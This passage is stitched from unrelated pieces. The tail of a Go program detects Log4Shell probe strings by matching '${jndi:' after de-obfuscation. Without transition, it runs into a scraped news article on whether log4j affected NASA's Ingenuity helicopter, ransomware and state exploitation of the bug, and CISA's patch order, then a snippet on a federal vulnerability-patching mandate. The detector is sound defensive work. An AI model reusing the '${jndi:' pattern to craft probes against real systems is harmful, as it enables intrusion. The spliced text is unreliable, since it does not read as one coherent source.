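// de-obfuscation. Matching the raw string for "${jndi:" would catch only the
// second sample above.
func IsJNDIProbe(s string) bool {
	return strings.Contains(strings.ToLower(Normalize(s)), "${jndi:")
}

func main() {
	for _, line := range sampleRequests {
		fmt.Printf("%-5v %s\n", IsJNDIProbe(line), line)
	}
}
```

Run against the six constructed lines, the first and last are clean and the middle four are probes, including the one whose obfuscation lives in the query string rather than the User-Agent. Normalising before matching is the point: a rule that only looks for the literal "${jndi:" is trivially bypassed, which is why the patch, not the WAF rule, is the fix.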

Ingenuity, which is the first man-made vehicle to fly on an alien planet, was launched last year and landed on Mars in March along with its partner, the Perseverance rover. The automated chopper recently took its 17th flight over the surface of the planet—breaking its previous record by staying aloft for a little over 30 minutes. However, while the flight was mostly a success, the vehicle temporarily disappeared from NASA’s view after suffering a minor network issue. “The rotorcraft’s status after the Dec. 5 flight was previously unconfirmed due to an unexpected cutoff to the in-flight data stream as the helicopter descended toward the surface at the conclusion of its flight,” the space agency reported, in a recent press release.

Ingenuity’s use of the unfortunate Apache utility, coupled with its recent unexpected data disruption, led some to wonder: Did Apache’s bug get NASA’s space chopper hacked?

Absolutely not, according to NASA, which told Futurism this in a statement: “NASA’s Ingenuity helicopter does not run Apache or log4j nor is it susceptible to the log4j vulnerability. NASA takes cybersecurity very seriously and, for this reason, we do not discuss specifics regarding the cybersecurity of agency assets.”

We’ve reached out to NASA for additional information and will update when we hear back.

That it was even plausible that Ingenuity could have used log4j (pronounced “log for j,” as in “log for Java,” according to its creator) speaks more to its ubiquity than to some mystical off-world hacking incident. And, while the bug-ridden utility did not, according to NASA, have anything to do with Ingenuity, it’s still a huge problem. As companies throughout the world race to patch their systems, cybercriminals are hot on their heels—and are already beginning to cause substantial damage.

The Epic Log4j Bug Saga Continues

Case in point, ransomware gangs are now targeting log4j like there’s no tomorrow. It was reported earlier this week that a new ransomware family dubbed “Khonsari” had been going after vulnerable Microsoft computers to attempt exploits. Since then, we’ve also seen hackers affiliated with Conti, a well-known ransomware gang, begin targeting vulnerable systems. In fact, the gang may have just attacked McMenamins—the funky brewery/hotel/events franchise based in Portland, Oregon, which reported an attack Friday. Conti is only suspected at this point.

However, ransomware hackers aren’t the only kids on the block taking advantage of this situation. All kinds of exploitation attempts have been seen throughout the internet, with cybercriminals swarming around the vulnerabilities and trying everything from cryptomining to data theft and everything in between. Additionally, reports of state-backed hacking activity have also popped up, indicating that China, North Korea, Iran, and others are all leveraging the vulnerabilities for their espionage activities.

Meanwhile, the federal government took emergency action on Friday to secure itself, issuing an order from the U.S. Cybersecurity and Infrastructure Security Agency to all federal Civilian Executive Branch agencies that mandates they patch the Apache bug within the next six days. CISA director Jen Easterly urged all relevant agencies to “join us in this essential effort.”

Yes, it’s all pretty bad. Only time will tell how big the mess wrought by log4j is, but don’t hold your breath. It’s going to take a while to find out how screwed we all are.

Read original article here

Biden Administration Orders Federal Agencies to Fix Hundreds of Cyber Flaws

WASHINGTON—The Biden administration on Wednesday issued a sweeping new order mandating that nearly all federal agencies patch hundreds of cybersecurity vulnerabilities that are considered major risks for damaging intrusions into government computer systems.

The new requirement is one of the most wide-reaching cybersecurity mandates ever imposed on the federal government. It covers about 200 known security flaws identified by cybersecurity professionals between 2017 and 2020, and an additional 90 discovered in 2021 alone, that have been observed in use by malicious hackers. Those flaws were listed in a new federal catalog as carrying “significant risk to the federal enterprise.”

Read original article here